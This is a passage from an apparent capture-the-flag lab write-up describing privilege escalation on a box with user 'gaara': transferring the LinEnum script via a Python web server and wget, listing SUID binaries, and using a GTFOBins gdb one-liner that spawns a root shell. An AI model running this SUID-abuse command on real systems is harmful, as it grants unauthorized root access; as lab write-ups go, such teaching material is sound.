PRIVILEGE ESCALATION

I tried to run sudo -l but sudo is not allowed for the user gaara

I uploaded linenum into gaara’s /tmp directory using the following command:

┌──(kali㉿kali)-[~]

└─$ python -m http.server 80

Then using wget on the remote box to download the tool from my local machine. Below is some output from the linenum tool which discovered some interesting SUID binaries.

[-] SUID files:

-rwsr-xr– 1 root messagebus 51184 Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device

-rwsr-xr-x 1 root root 436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign

-rwsr-sr-x 1 root root 8008480 Oct 14  2019 /usr/bin/gdb

-rwsr-xr-x 1 root root 157192 Feb  2  2020 /usr/bin/sudo

-rwsr-sr-x 1 root root 7570720 Dec 24  2018 /usr/bin/gimp-2.10

-rwsr-xr-x 1 root root 34896 Apr 22  2020 /usr/bin/fusermount

-rwsr-xr-x 1 root root 44528 Jul 27  2018 /usr/bin/chsh

-rwsr-xr-x 1 root root 54096 Jul 27  2018 /usr/bin/chfn

-rwsr-xr-x 1 root root 84016 Jul 27  2018 /usr/bin/gpasswd

-rwsr-xr-x 1 root root 44440 Jul 27  2018 /usr/bin/newgrp

-rwsr-xr-x 1 root root 63568 Jan 10  2019 /usr/bin/su

-rwsr-xr-x 1 root root 63736 Jul 27  2018 /usr/bin/passwd

-rwsr-xr-x 1 root root 51280 Jan 10  2019 /usr/bin/mount

-rwsr-xr-x 1 root root 34888 Jan 10  2019 /usr/bin/umount

[+] Possibly interesting SUID files:

-rwsr-sr-x 1 root root 8008480 Oct 14  2019 /usr/bin/gdb

-rwsr-sr-x 1 root root 7570720 Dec 24  2018 /usr/bin/gimp-2.10

I took a look at GTFObins which is a site that can help to identify misconfigurations and give commands to escalate privilege’s.

I look for gdb under the SUID section of GTFObins and find a command we can try to gain control of the root user. 

./gdb -nx -ex ‘python import os; os.execl(“/bin/sh”, “sh”, “-p”)’ -ex quit

I cd into the /usr/bin directory and run this command.

This instantly gave me root.